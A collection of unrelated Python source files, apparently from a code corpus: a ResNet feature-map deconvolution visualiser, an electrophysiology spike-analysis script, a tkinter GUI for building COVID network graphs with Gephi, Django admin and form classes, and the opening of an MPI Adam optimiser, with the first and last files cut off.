im_as_arr[channel] /= std[channel]
# Convert to float tensor
im_as_ten = torch.from_numpy(im_as_arr).float()
# Add one more channel to the beginning. Tensor shape = 1,3,224,224
im_as_ten.unsqueeze_(0)
# Convert to Pytorch variable
im_as_var = Variable(im_as_ten, requires_grad=True)
return im_as_var
class FeatureVisualization():
def __init__(self, img_path, selected_layer, model, chan=0):
self.img_path = img_path
self.selected_layer = selected_layer
self.pretrained_model = model.named_modules()
self.chan = chan
def process_image(self):
img = cv2.imread(self.img_path)
img = preprocess_image(img)
return img
def get_feature(self):
# input = Variable(torch.randn(1, 3, 224, 224))
input = self.process_image()
print(input.shape)
x = input.cuda()
if self.selected_layer == 'conv1':
for index, layer in enumerate(self.pretrained_model):
if layer[0] in ['conv1.0']:
x = layer[1](x)
return x
elif self.selected_layer == 'conv5-x':
for index, layer in enumerate(self.pretrained_model):
if layer[0] in ['conv1', 'conv2_x', 'conv3_x', 'conv4_x', 'conv5_x.0']:
x = layer[1](x)
if (layer[0] == 'conv5_x.0' ):
return x
def get_single_feature(self):
features = self.get_feature()
print(features.shape)
feature = features[:, self.chan, :, :] # 在这里可以提取 64 个
# feature = features[self.chan, :, :]
feature = feature.view(feature.shape[1], feature.shape[2])
print(feature.shape)
return feature
def get_deconv_feature(self):
feature = self.get_feature()
if self.selected_layer == 'conv1':
unConv1 = nn.ConvTranspose2d(64, 3, kernel_size=7, padding=3, stride=2, bias=False).cuda()
deconv_features = unConv1(feature)
deconv_feature = deconv_features[:, 0, :, :]
deconv_feature = deconv_feature.view(deconv_feature.shape[1], deconv_feature.shape[2])
return deconv_feature
elif self.selected_layer == 'conv5-x':
unConv_5 = nn.ConvTranspose2d(512, 256, kernel_size=3, stride=2, padding = 1,bias=False).cuda()
unBN_5 = nn.BatchNorm2d(256).cuda()
unReLU_5 = nn.ReLU(inplace=True).cuda()
unConv_4 = nn.ConvTranspose2d(256, 128, kernel_size=3, stride=2, padding = 1, bias=False).cuda()
unBN_4 = nn.BatchNorm2d(128).cuda()
unReLU_4 = nn.ReLU(inplace=True).cuda()
unConv_3 = nn.ConvTranspose2d(128, 64, kernel_size=3, stride=2, padding = 1, bias=False).cuda()
unBN_3 = nn.BatchNorm2d(64).cuda()
unReLU_3 = nn.ReLU(inplace=True).cuda()
unConv_2 = nn.ConvTranspose2d(64, 64, kernel_size=3, stride=2, padding = 1, bias=False).cuda()
unBN_2 = nn.BatchNorm2d(64).cuda()
unReLU_2 = nn.ReLU(inplace=True).cuda()
unConv1 = nn.ConvTranspose2d(64, 3, kernel_size=7, stride=2, padding=3, bias=False).cuda()
deconv_features = unConv_5(feature)
deconv_features = unBN_5(deconv_features)
deconv_features = unReLU_5(deconv_features)
deconv_features = unConv_4(deconv_features)
deconv_features = unBN_4(deconv_features)
deconv_features = unReLU_4(deconv_features)
deconv_features = unConv_3(deconv_features)
deconv_features = unBN_3(deconv_features)
deconv_features = unReLU_3(deconv_features)
deconv_features = unConv_2(deconv_features)
deconv_features = unBN_2(deconv_features)
deconv_features = unReLU_2(deconv_features)
deconv_features = unConv1(deconv_features)
deconv_feature = deconv_features[:, 0, :, :]
deconv_feature = deconv_feature.view(deconv_feature.shape[1], deconv_feature.shape[2])
return deconv_feature
def save_feature_to_img(self, file, ax1):
feature = self.get_deconv_feature()
feature = feature.data.cpu().detach().numpy()
# use sigmod to [0,1]
feature = 1.0 / (1 + np.exp(-1 * feature))
# to [0,255]
feature = np.round(feature * 255)
print(os.path.splitext(file))
w_min = np.min(feature)
w_max = np.max(feature)
print(feature)
if self.selected_layer == 'conv1':
feature = cv2.applyColorMap(np.uint8(feature), cv2.COLORMAP_JET)
ax1.imshow(feature, vmin=w_min, vmax=w_max,
interpolation='nearest') # 'gist_ncar'
ax1.set_xticks([])
ax1.set_yticks([])
if __name__ == '__main__':
net = ResNet(BasicBlock, [2, 2, 2, 2])
net = net.cuda()
net.load_state_dict(torch.load('resnet18-25-best.pth'))
for file in os.listdir('./img_fmap'):
if 'after' not in file:
# for layer in ['conv1', 'conv5-x']:
for layer in ['conv1']:
fig, axes = plt.subplots(8, 8, figsize=(10, 10))
for i, ax1 in enumerate(axes.flat):
myClass1 = FeatureVisualization('./img_fmap/'+ file, layer, net, chan=i) # conv1 or conv5-x
print(myClass1.pretrained_model)
myClass1.save_feature_to_img('./img_fmap/'+ file, ax1)
plt.show()
fig.savefig('{}_{}_after_Deconv1.jpg'.format('./img_fmap/'+ os.path.splitext(file)[0], layer), bbox_inches = 'tight')
for file in os.listdir('./img_fmap'):
if 'after' not in file:
for layer in ['conv5-x']:
fig, ax1 = plt.subplots()
myClass1 = FeatureVisualization('./img_fmap/'+ file, layer, net, chan=0) # conv1 or conv5-x
print(myClass1.pretrained_model)
myClass1.save_feature_to_img('./img_fmap/'+ file, ax1)
fig.savefig('{}_{}_after_Deconv5.jpg'.format('./img_fmap/' + os.path.splitext(file)[0], layer),
bbox_inches='tight') |
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 17 16:34:14 2021
@author: kkondrakiewicz
"""
#%% Imports
import sys
# Add directory with ephys module
sys.path.append(r'C:\Users\kkondrakiewicz\Documents\Python Scripts\EphysAnalysis')
import ephys as ep
import numpy as np
import matplotlib.pyplot as plt
#%% Set parameters
spks_dir = "D:\\buffering_np\\NP2_test\\" # directory with spikes (Phy output)
sounds = np.loadtxt("D:\\buffering_np\\NP2_test\\TTL_gcat\\TTL_3.txt") # txt file with event timestamps
save_dir = 'C:\\Users\\kkondrakiewicz\\Desktop\\ploty\\' # where to save plots
# window size for analysis (in seconds)
pre_event = 2.0
post_event = 5.0
bin_size = 0.250
# Read spikes from good units; in real life set also sampling_rate parameter to the one from Neuropixels .meta file
spikes_ts, units_id = ep.read_spikes(spks_dir, read_only = 'good')
# Center spikes on events (within a selected time window, for each trial)
centered_ts = ep.calc_rasters(spikes_ts, sounds, pre_event, post_event)
# Based on the centered data, plot rasters for all neurons
fig, axes = ep.plot_rasters(centered_ts)
fig.suptitle('Single neurons - responses to events')
# Now calculate also firing rate for each time bin and each trial
all_fr, mean_fr, sem_fr, bin_edges = ep.fr_events(centered_ts, bin_size, pre_event, post_event)
# And also normalize the firing rate to individual baselines (pre-event period during each trial)
all_zsc, mean_zsc, sem_zsc, bin_edges = ep.zscore_events(all_fr, bin_size, pre_event, post_event)
# Now you can plot the PSTH: mean firing rate (normalized or not) together with SEM, for all neurons
fig, axes = ep.plot_psth(mean_zsc, sem_zsc, bin_edges[1:])
fig.suptitle('Single neurons - mean responses to events')
# Or combine the raster and PSTH on a separate plot: this we don't want to display for all neurons, so instead save it
ep.plot_responses(centered_ts, mean_fr, sem_fr, bin_edges[1:], save_dir)
#%% Plot responses of all neurons using one heatmap
import seaborn as sns
sns.heatmap(mean_zsc[mean_zsc[:,8].argsort()], xticklabels=bin_edges[1:])
#%%
all_cont, mean_cont, sem_cont, t_vec = ep.fr_events_binless(centered_ts, 0.1, 4, 30000.0, 1000, pre_event, post_event)
#%%
#ep.plot_psth(mean_cont, sem_cont, t_vec)
ep.plot_responses(centered_ts, mean_cont, sem_cont, t_vec, 'C:\\Users\\kkondrakiewicz\\Desktop\\ploty2\\')
#%% Plot responses of all neurons using one heatmap
plt.figure()
sortby = np.mean(mean_cont[:, int(1000*pre_event) : int(1000*pre_event+500)], 1).argsort()
sns.heatmap(mean_cont[sortby,0::10]) |
import queue
import tkinter as tk
import webbrowser
from subprocess import Popen
from thread import ThreadedTask
from tkinter import messagebox
from tkinter.colorchooser import *
from tkinter.filedialog import askopenfilename, asksaveasfile
from tkinter.ttk import *
import matplotlib.pyplot as plt
import pandas as pd
import pyperclip
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from pandastable import Table, TableModel
from tkcalendar import DateEntry
import ListBox as lb
from pdf import ReportGen
class GUI():
"""
GUI class creates GUI for a passed tkinter object and a data program.
This class uses ThreadedTask class for parallel processing of results.
Args: prog: data program instance window: tkinter root instance
"""
def __init__(self, prog, window):
self.gexffile = ""
self.frame_w = 480
self.frame_h = 315
self.prog = prog
self.window = window
self.statusTxt = tk.StringVar()
self.report = None
self.statusTxt.set("STATUS")
def msg(self, val):
# Displays error message box with argument val
messagebox.showerror("EMPTY", "INPUT VALUE "+val)
self.window.config(cursor="arrow")
def grid_config(self, frame):
# Configures grid layout
col_count, row_count = frame.grid_size()
for col in range(col_count):
frame.grid_columnconfigure(col, minsize=20)
for row in range(row_count):
frame.grid_rowconfigure(row, minsize=20)
def frame1(self, nb):
# Generates DOWNLOAD frame and returns
f1 = Frame(nb, width=self.frame_w, height=self.frame_h/2)
f1.grid_propagate(0) # Resets auto grid shrink and growth
# Table frame inside f1
ft = Frame(f1, width=self.frame_w, height=self.frame_h/2)
ft.pack(side=tk.BOTTOM)
df = pd.DataFrame() # Blank dataframe
pt = Table(ft, dataframe=df, rows=5, height=100, width=400)
Label(f1, text="INPUT LINK").grid(column=2, row=2, sticky='w')
linkTxt = tk.StringVar()
link = Entry(f1, width=50, textvariable=linkTxt)
link.focus()
linkTxt.set("")
link.grid(column=4, row=2)
# DOWNLOAD button start
btn_down = Button(f1, text="DOWNLOAD")
# Nested function for downloading dataframe using queue
def process_queue_dldf():
try:
df = self.queue.get(0)
if df is not None:
pt.updateModel(TableModel(df))
pt.show()
pt.redraw()
self.set_status("DOWNLOADED!")
self.window.config(cursor="arrow")
except queue.Empty:
self.window.after(100, process_queue_dldf)
# Nested click function for DOWNLOAD button
def click_down():
if not linkTxt.get():
self.msg("LINK")
return
self.window.config(cursor="wait")
# download db using ThreadedTask class, on complete: continue
self.set_status("DOWNLOADING!")
self.queue = queue.Queue()
ThreadedTask(self.queue, self.prog, "dldf", linkTxt.get()).start()
df = self.window.after(100, process_queue_dldf)
btn_down.configure(command=click_down)
btn_down.grid(column=2, row=5, sticky='sw')
# DOWNLOAD button end
# SAVE button start
btn_save = Button(f1, text="SAVE")
# Nested function for saving dataframe as csv using queue
def process_queue_scsv():
try:
msg = self.queue.get(0)
if msg is not None:
self.set_status("FILE SAVED AT "+msg.name)
self.window.config(cursor="arrow")
except queue.Empty:
self.window.after(100, process_queue_scsv)
# Nested click function for SAVE button
def click_save():
if df is not None:
files = [('Comma Separated Values', '*.csv')]
save_file = asksaveasfile(
filetypes=files, defaultextension=files)
if not save_file:
return
# save dataframe using ThreadedTask class, on complete: continue
self.queue = queue.Queue()
ThreadedTask(self.queue, self.prog, "scsv", save_file).start()
self.window.after(100, process_queue_scsv)
btn_save.configure(command=click_save)
btn_save.grid(column=4, row=5, sticky='se')
# SAVE button end
self.grid_config(f1)
return f1
def frame2(self, nb):
# Generates SELECT frame and returns
f2 = Frame(nb, width=self.frame_w, height=self.frame_h)
f2.grid_propagate(0) # Resets grid shrink and growth auto
Label(f2, text="SELECT GRAPH TYPE:").grid(column=2, row=2, sticky='w')
graph_field = self.prog.get_graph_field()
graph_type = tk.StringVar(f2)
graph_type.set(graph_field[0])
option = OptionMenu(f2, graph_type, *graph_field)
option.config(width=40)
option.grid(column=3, row=2)
Label(f2, text="SELECT COLOR FIELD:").grid(column=2, row=3, sticky='w')
color_field = self.prog.get_color_field()
color_type = tk.StringVar(f2)
color_type.set(color_field[0])
optionc = OptionMenu(f2, color_type, *color_field)
optionc.config(width=40)
optionc.grid(column=3, row=3)
colordict = tk.StringVar()
def change_color(var, indx, mode):
col_dict = {}
clrsc = tk.Toplevel(self.window)
clrsc.geometry('300x300')
clrsc.transient()
clrsc.focus_set()
clrsc.title('CHOOSE COLOR')
col_list = tk.Listbox(
clrsc, height=5, width=40, selectmode=tk.SINGLE)
col_list.insert(
tk.END, *self.prog.get_unique_val(color_type.get()))
def onselect(evt):
w = evt.widget
index = int(w.curselection()[0])
value = w.get(index)
rgb, color = askcolor(
parent=clrsc, title='Choose {} color'.format(value))
col_dict[value] = color
col_list.bind('<<ListboxSelect>>', onselect)
col_list.config(width=35)
col_list.pack()
# SELECT button start
btn_sel = Button(clrsc, text="SELECT")
# Nested function for sel button save choices
def click_sel():
clrsc.destroy()
btn_sel.configure(command=click_sel)
btn_sel.pack()
# SELECT button end
# RETURN button start
btn_ret = Button(clrsc, text="DON'T SELECT")
# Nested function for ret button
def click_ret():
clrsc.destroy()
colordict.set('0')
btn_ret.configure(command=click_ret)
btn_ret.pack()
self.window.wait_window(clrsc)
if not bool(col_dict) or None in col_dict.values():
colordict.set('0')
else:
colordict.set(col_dict)
color_type.trace_add('write', change_color)
# OPEN button start
btn_open = Button(f2, text="OPEN")
# Nested open function for open button
def click_open():
files = [('Comma Separated Values', '*.csv')]
open_filename = askopenfilename(filetypes=files)
if open_filename:
self.prog.open_file(open_filename, 0)
click_ref()
self.set_status("FILE OPENED "+open_filename)
btn_open.configure(command=click_open)
btn_open.grid(column=2, row=1, sticky='wn')
# OPEN button end
Label(f2, text="SELECT DATE RANGE:").grid(column=2, row=4, sticky='w')
# get start and end date in row 5
calstart = DateEntry(f2, date_pattern="y-mm-dd", state=tk.DISABLED)
calstart.grid(column=2, row=5, sticky='w')
calend = DateEntry(f2, date_pattern="y-mm-dd", state=tk.DISABLED)
calend.grid(column=3, row=5, sticky='e')
# GENERATE button start
btn_gen = Button(f2, text="GENERATE")
# Nested function for saving nx graph as gexf using queue
def process_queue_sgexf():
try:
save_file = self.queue.get(0)
if save_file is not None:
self.set_status("FILE SAVED AT "+save_file)
self.window.config(cursor="arrow")
except queue.Empty:
self.window.after(100, process_queue_sgexf)
# Nested function for generating nx graph using queue
def process_queue_gengf():
try:
colord = self.queue.get(0)
if type(colord) is dict:
color = ""
Label(f2, text="COLORING DETAILS").grid(
column=2, row=11, sticky='nws')
info = tk.Text(f2, height=5, width=30)
info.configure(state=tk.NORMAL)
real = 1
for k in colord.keys():
l = len(str(k))
color = str(k)+"\n"
c = [e for e in colord.get(k).values()]
c.pop()
c = '#{:02x}{:02x}{:02x}'.format(*c)
info.insert(tk.END, color)
info.tag_add(k, str(real)+".0",
str(real)+"."+str(l))
info.tag_configure(
k, foreground=c, font=("Helvetica", 12, "bold"))
real += 1
info.configure(state=tk.DISABLED)
info.grid(column=3, row=11, sticky='nw')
self.set_status("GRAPH GENERATED!")
self.window.config(cursor="arrow")
files = [('Graph Exchange XML Format', '*.gexf')]
save_file = asksaveasfile(
filetypes=files, defaultextension=files)
if not save_file:
return
self.window.config(cursor="wait")
self.gexffile = save_file.name
# save nx graph using ThreadedTask class, on complete: continue
self.queue = queue.Queue()
ThreadedTask(self.queue, self.prog,
"sgexf", self.gexffile).start()
self.window.after(100, process_queue_sgexf)
except queue.Empty:
self.window.after(100, process_queue_gengf)
# Nested click function for GENERATE button
def click_gen():
if graph_type.get() == "SELECT":
self.msg("GRAPH TYPE")
return
elif color_type.get() == "SELECT":
self.msg("COLOR TYPE")
return
self.window.config(cursor="wait")
# generate nx graph using ThreadedTask class, on complete: continue
self.queue = queue.Queue()
ThreadedTask(self.queue, self.prog, "gengf",
graph_type.get(), color_type.get(), calstart.get_date(), calend.get_date(), colordict.get()).start()
self.window.after(100, process_queue_gengf)
btn_gen.configure(command=click_gen)
btn_gen.grid(column=3, row=7, sticky='se')
# GENERATE button end
# REFRESH button start
btn_ref = Button(f2, text="REFRESH")
# Nested refresh function for ref button
def click_ref():
graph_field = self.prog.get_graph_field()
start, end = self.prog.get_daterange()
calstart.config(state=tk.NORMAL, mindate=start, maxdate=end)
calend.config(state=tk.NORMAL, mindate=start, maxdate=end)
option['menu'].delete(0, 'end')
graph_type.set(graph_field[0])
for choice in graph_field:
option['menu'].add_command(
label=choice, command=tk._setit(graph_type, choice))
color_field = self.prog.get_color_field()
optionc['menu'].delete(0, 'end')
color_type.set(color_field[0])
for choice in color_field:
optionc['menu'].add_command(
label=choice, command=tk._setit(color_type, choice))
self.set_status("REFRESHED!")
self.window.config(cursor="arrow")
btn_ref.configure(command=click_ref)
btn_ref.grid(column=2, row=7, sticky='ws')
# REFRESH button end
self.grid_config(f2)
return f2
def frame3(self, nb):
# Generates DISPLAY frame and returns
f3 = Frame(nb, width=self.frame_w, height=self.frame_h)
f3.grid_propagate(0) # Resets grid shrink and growth auto
Label(f3, text="GRAPH DETAILS").grid(column=2, row=2, sticky='w')
info = tk.Text(f3, height=5, width=40)
info.insert(tk.END, self.prog.get_info())
info.configure(state=tk.DISABLED)
info.grid(column=2, row=3, sticky='nw')
# GEPHI button start
btn_gephi = Button(f3, text="LAUNCH GEPHI")
# Nested click function for gephi launch
def click_gephi():
self.window.config(cursor="wait")
# run GEPHI
cmd = 'cmd /c ' + self.gexffile
Popen(cmd, shell=False)
self.window.config(cursor="arrow")
btn_gephi.configure(command=click_gephi)
btn_gephi.grid(column=2, row=6, sticky='se')
# GEPHI button end
# REFRESH button start
btn_ref = Button(f3, text="REFRESH")
# Nested refresh function for ref button
def click_ref():
info.configure(state=tk.NORMAL)
info.delete('1.0', tk.END)
info.insert(tk.END, self.prog.get_info())
info.configure(state=tk.DISABLED)
self.set_status("REFRESHED!")
self.window.config(cursor="arrow")
btn_ref.configure(command=click_ref)
btn_ref.grid(column=2, row=6, sticky='ws')
# REFRESH button end
# OPEN button start
btn_open = Button(f3, text="OPEN")
# Nested refresh function for open button
def click_open():
files = [('Graph Exchange XML Format', '*.gexf')]
open_filename = askopenfilename(filetypes=files)
if open_filename:
infotxt = self.prog.open_file(open_filename, 1)
self.gexffile = open_filename
info.configure(state=tk.NORMAL)
info.delete('1.0', tk.END)
info.insert(tk.END, infotxt)
info.configure(state=tk.DISABLED)
self.set_status("FILE OPENED "+open_filename)
btn_open.configure(command=click_open)
btn_open.grid(column=2, row=1, sticky='wn')
# OPEN button end
self.grid_config(f3)
return f3
def showmatgraph(self, df, graph_type, legend, subplots, stacked):
# Generates matplotlib graph in separate dialog
plotsc = tk.Toplevel(self.window)
plotsc.geometry('600x600')
plotsc.transient()
plotsc.focus_set()
plotsc.title('STATIC GRAPH')
figure = plt.Figure(figsize=(6, 6), dpi=100)
ax = figure.add_subplot(111)
chart_type = FigureCanvasTkAgg(figure, plotsc)
chart_type.get_tk_widget().pack()
ax.set_title(graph_type)
graph_col = list(df.columns.values)
fig = None
if graph_type == 'bar' or graph_type == 'barh':
fig = df.groupby(graph_col).size().unstack(fill_value=0).plot(
kind=graph_type, rot=45, legend=legend, stacked=stacked, ax=ax, subplots=subplots)
elif graph_type == 'line':
fig = df.groupby([graph_col[0], graph_col[1]]).size().unstack(fill_value=0).plot(
kind='line', rot=45, legend=legend, stacked=stacked, ax=ax, subplots=subplots)
elif graph_type == 'pie':
fig = df.groupby(graph_col)[graph_col].count().plot(
kind='pie', rot=45, legend=legend, stacked=False, ax=ax, subplots=True)
if subplots:
fig=fig[0]
self.report.set_image(fig.get_figure())
def save_graph(event):
files = [('Portable Document Format', '*.pdf')]
save_file = asksaveasfile(filetypes=files, defaultextension=files)
if save_file:
self.report.gen_report(save_file.name)
self.set_status("FILE SAVED AT "+save_file.name)
plotsc.bind('<Double-Button-1>', save_graph)
self.window.config(cursor="arrow")
def frame4(self, nb):
# Generates STATIC GRAPH frame and returns
f4 = Frame(nb, width=self.frame_w, height=self.frame_h)
f4.grid_propagate(0) # Resets grid shrink and growth auto
# OPEN button start
btn_open = Button(f4, text="OPEN")
# Nested refresh function for open button
def click_open():
files = [('Comma Separated Values', '*.csv')]
open_filename = askopenfilename(filetypes=files)
if open_filename:
collist = self.prog.open_file(open_filename, 0)
col_list.delete(0, tk.END)
col_list.insert(tk.END, *collist)
self.set_status("FILE OPENED "+open_filename)
btn_open.configure(command=click_open)
btn_open.grid(column=2, row=1, sticky='wn')
# OPEN button end
Label(f4, text="SELECT GRAPH TYPE:").grid(column=2, row=2, sticky='w')
graph_field = ['SELECT', 'line', 'pie', 'bar', 'barh']
graph_type = tk.StringVar(f4)
graph_type.set(graph_field[0])
option = OptionMenu(f4, graph_type, *graph_field)
option.config(width=35)
option.grid(column=2, row=3, sticky='s')
graph_field_select_mode = tk.EXTENDED
Label(f4, text="SELECT GRAPH COLUMNS:").grid(
column=2, row=4, sticky='w')
col_list = lb.Listbox2(f4, height=5, width=40,
selectmode=graph_field_select_mode)
col_list.insert(tk.END, self.prog.get_graph_field())
col_list.grid(column=2, row=5, sticky='nw')
# trace method for graph_type
def graphchange(var, indx, mode):
gtype = graph_type.get()
if gtype == 'pie':
graph_field_select_mode = tk.SINGLE
else:
graph_field_select_mode = tk.EXTENDED
col_list.config(selectmode=graph_field_select_mode)
graph_type.trace_add('write', graphchange)
Label(f4, text="OPTIONS:").grid(column=4, row=2, sticky='w')
legend = tk.BooleanVar()
legend.set(False)
Checkbutton(f4, text="LEGEND", variable=legend).grid(
column=4, row=3, sticky='nwe')
subplots = tk.BooleanVar()
subplots.set(False)
Checkbutton(f4, text="SUBPLOTS", variable=subplots).grid(
column=4, row=4, sticky='nwe')
stacked = tk.BooleanVar()
stacked.set(False)
Checkbutton(f4, text="STACKED", variable=stacked).grid(
column=4, row=5, sticky='nwe')
# trace method for subplots
def optionsubplot(var, indx, mode):
if subplots.get() == True and stacked.get() == True:
stacked.set(False)
# trace method for stacked
def optionstacked(var, indx, mode):
if subplots.get() == True and stacked.get() == True:
subplots.set(False)
subplots.trace_add('write', optionsubplot)
stacked.trace_add('write', optionstacked)
selecteddict = {}
def select_option(evnt):
w = evnt.widget
index = int(w.curselection()[0])
value = w.get(index)
optsc = tk.Toplevel(self.window)
optsc.geometry('300x300')
optsc.transient()
optsc.focus_set()
optsc.title('CHOOSE FIELDS')
Label(optsc, text=" ").pack()
col_list = tk.Listbox(
optsc, height=5, width=40, selectmode=tk.EXTENDED)
col_list.insert(tk.END, *self.prog.get_unique_val(value))
col_list.config(width=35)
col_list.pack()
# SELECT button start
btn_sel = Button(optsc, text="SELECT")
# Nested function for sel button save choices
def click_sel():
selecteddict[value] = [col_list.get(
x) for x in col_list.curselection()]
optsc.destroy()
btn_sel.configure(command=click_sel)
btn_sel.pack()
# SELECT button end
# RETURN button start
btn_ret = Button(optsc, text="DON'T SELECT")
# Nested function for ret button
def click_ret():
optsc.destroy()
btn_ret.configure(command=click_ret)
btn_ret.pack()
self.window.wait_window(optsc)
# color_type.trace_add('write', change_color)
col_list.bind('<Double-Button-1>', select_option)
# GRAPH button start
btn_graph = Button(f4, text="GENERATE GRAPH")
# Nested click function for gephi launch
def click_graph():
self.window.config(cursor="wait")
# get dataframe and generate graph
slist = []
for i in col_list.curselection():
slist.append(col_list.get(i))
if not slist:
self.msg("COLUMNS")
return
elif graph_type.get() == "SELECT":
self.msg("GRAPH TYPE")
return
self.report = ReportGen(graph_type.get(), legend.get(),
subplots.get(), stacked.get(), slist, selecteddict)
df = self.prog.get_df(slist, selecteddict)
self.showmatgraph(df, graph_type.get(), legend.get(),
subplots.get(), stacked.get())
btn_graph.configure(command=click_graph)
btn_graph.grid(column=4, row=7, sticky='s')
# GRAPH button end
# REFRESH button start
btn_ref = Button(f4, text="REFRESH")
# Nested refresh function for ref button
def click_ref():
collist = self.prog.get_graph_field()
col_list.delete(0, tk.END)
col_list.insert(tk.END, *collist)
self.set_status("REFRESHED!")
self.window.config(cursor="arrow")
btn_ref.configure(command=click_ref)
btn_ref.grid(column=2, row=7, sticky='ws')
# REFRESH button end
self.grid_config(f4)
return f4
def statusbar(self):
# Defines a single row statusbar using Label
status = Label(self.window, textvariable=self.statusTxt,
relief=tk.SUNKEN, width=self.frame_w, cursor='hand2')
return status
def set_status(self, txt):
# Sets status by changing statusbar Label textvariable
self.statusTxt.set(txt)
def getlink(self, *arg):
# Copy link to clipboard
pyperclip.copy('https://api.covid19india.org/raw_data.json')
self.set_status("LINK COPIED TO CLIPBOARD!")
def helpscreen(self, *arg):
# Creates help window
helpsc = tk.Toplevel(self.window)
helpsc.geometry('300x300')
helpsc.transient()
helpsc.focus_set()
helpsc.title('HELP')
help_txt = """\nTabs:\n1.DOWNLOAD: Download, view first 100 rows and save dataframe as CSV\n2.SELECT: Select graph type, node color field, and view the color assigned, save the generated graph file as GEXF\n3.DISPLAY: Check the graph attributes, open the file in gephi(installation required for viewing graph).\n4.STATIC GRAPH: Select graph type, graph fields(& reorder them), options, generate static graph and reports.\n\n Open CSV, GEXF file directly for viewing results."""
Label(helpsc, text=help_txt, justify=tk.LEFT, wraplength=250).pack()
# LINK button
Button(helpsc, text="COPY LINK", command=self.getlink).pack()
# GEPHI_DOWNLOAD button start
btn_link = Button(helpsc, text="DOWNLOAD GEPHI")
# Nested function for link button to open website
def click_link():
webbrowser.open('https://gephi.org/users/download/')
btn_link.configure(command=click_link)
btn_link.pack()
# GEPHI_DOWNLOAD button end
def aboutscreen(self, *arg):
# Creates about window
aboutsc = tk.Toplevel(self.window)
aboutsc.geometry('300x300')
aboutsc.transient()
aboutsc.focus_set()
aboutsc.title('ABOUT')
about_txt = """\nPYSNV\n\nVersion:1.3\n\nThis software creates dynamic network graph from csv.\n\nPackages:Networkx, matplotlib, pandas, tkinter.\n\n"""
Label(aboutsc, text=about_txt, justify=tk.CENTER, wraplength=250).pack()
# LINK button start
btn_link = Button(aboutsc, text="CHECK WEBSITE")
# Nested function for link button to open website
def click_link():
webbrowser.open('https://github.com/sakshamsneh/pySNVCovid')
btn_link.configure(command=click_link)
btn_link.pack()
# LINK button end
def quitscreen(self, *arg):
# Creates quit option from menu
quitsc = tk.Toplevel(self.window)
quitsc.geometry('220x50')
quitsc.transient()
quitsc.focus_set()
quitsc.title('QUIT?')
Button(quitsc, text="YES", command=self.window.quit).pack()
Button(quitsc, text="NO", command=quitsc.destroy).pack()
def menubar(self):
menubar = tk.Menu(self.window)
helpmenu = tk.Menu(menubar, tearoff=0)
helpmenu.add_command(label="Sample Link",
command=self.getlink, accelerator="Ctrl+l")
helpmenu.add_command(
label="Help", command=self.helpscreen, accelerator="Ctrl+h")
helpmenu.add_command(
label="About", command=self.aboutscreen, accelerator="Ctrl+Shift+a")
helpmenu.add_command(
label="Quit", command=self.quitscreen, accelerator="Ctrl+q")
menubar.add_cascade(label="App", menu=helpmenu)
return menubar
def main(self):
self.window.geometry('480x360')
self.window.resizable(0, 0)
self.window.title("pySNV")
menubar = self.menubar()
self.window.config(menu=menubar)
nb = Notebook(self.window) # Notebook
nb.grid(row=1, sticky='nw')
f1 = self.frame1(nb)
f2 = self.frame2(nb)
f3 = self.frame3(nb)
f4 = self.frame4(nb)
# Adding three frames
nb.add(f1, text="DOWNLOAD")
nb.add(f2, text="SELECT")
nb.add(f3, text="DISPLAY")
nb.add(f4, text="STATIC GRAPH")
self.window.bind('<Control-l>', self.getlink)
self.window.bind('<Control-h>', self.helpscreen)
self.window.bind('<Control-A>', self.aboutscreen)
self.window.bind('<Control-q>', self.quitscreen)
self.window.protocol("WM_DELETE_WINDOW", self.quitscreen)
nb.select(f1)
nb.enable_traversal()
st = self.statusbar() # Creates status bar
st.grid(row=2, sticky='ws')
self.window.mainloop()
|
from django.conf import settings
from confapp import conf
from pyforms.basewidget import segment
from pyforms.controls import ControlCheckBox
from pyforms_web.web.middleware import PyFormsMiddleware
from pyforms_web.widgets.django import ModelAdminWidget
from finance.models import CostCenter
from .financeproject_list import FinanceProjectListApp
class CostCenterListApp(ModelAdminWidget):
TITLE = 'Cost Centers'
UID = 'cost-centers'
MODEL = CostCenter
LIST_DISPLAY = ['code', 'name', 'start_date', 'end_date']
LIST_FILTER = ['group', 'project__code']
SEARCH_FIELDS = ['name__icontains', 'code__icontains']
INLINES = [FinanceProjectListApp]
FIELDSETS = [
segment(
'name',
('code', 'start_date', 'end_date'),
'group',
),
' ',
'FinanceProjectListApp',
' ',
]
# ORQUESTRA CONFIGURATION
# =========================================================================
ORQUESTRA_MENU = 'left>FinancesDashboardWidget'
ORQUESTRA_MENU_ORDER = 10
ORQUESTRA_MENU_ICON = 'boxes'
LAYOUT_POSITION = conf.ORQUESTRA_HOME
# =========================================================================
AUTHORIZED_GROUPS = ['superuser', settings.PROFILE_LAB_ADMIN]
def __init__(self, *args, **kwargs):
self._active = ControlCheckBox(
'Active',
default=True,
label_visible=False,
changed_event=self.populate_list,
# field_style='text-align:right;', # FIXME breaks form
)
super().__init__(*args, **kwargs)
# Edit filter label
self._list.custom_filter_labels = {
'project__code': 'Project Code',
}
def get_toolbar_buttons(self, has_add_permission=False):
return tuple(
(['_add_btn'] if has_add_permission else []) + [
'_active',
]
)
def get_queryset(self, request, qs):
if self._active.value:
qs = qs.active()
return qs
def has_remove_permissions(self, obj):
"""Only superusers may delete these objects."""
user = PyFormsMiddleware.user()
return user.is_superuser
|
from django import forms
from .models import Post, Comment
# class PostForm(forms.ModelForm):
#
# class Meta:
# model = Post
# fields = ('title', 'author', 'description', 'category')
# widgets = {
# 'todo': forms.TextInput(
# attrs={
# 'id': 'inputPassword2',
# 'class': 'form-control',
# 'placeholder': 'Add your todo'
# }
# )
# }
# def save(self):
# new_todo = Todo.objects.create(
# todo= self.cleaned_data["todo"],
# author= self.request.User,
# )
# return new_todo
class CommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ('body',)
widgets = {
'body': forms.Textarea(
attrs={
'class': 'form-control',
'placeholder': 'write a comment...',
'rows': '3',
}
)
} |
# Adapted from https://github.com/openai/baselines/blob/master/baselines/common/mpi_adam.py
import rlkit.torch.optim.util as U
import torch
from torch.optim.optimizer import Optimizer
import math
import numpy as np
import rlkit.torch.pytorch_util as ptu
from rlkit.core.serializable import Serializable
try:
from mpi4py import MPI
except ImportError:
MPI = None
class MpiAdam(Optimizer):
def __init__(self,
params,
lr=1e-3,
beta1=0.9,
beta2=0.999,
epsilon=1e-08,
scale_grad_by_procs=True,
comm=None,
gpu_id=0):
# Serializable.quick_init(self,
# locals())
super().__init__(params, dict())
self.lr = lr
self.beta1 = beta1
self.beta2 = beta2
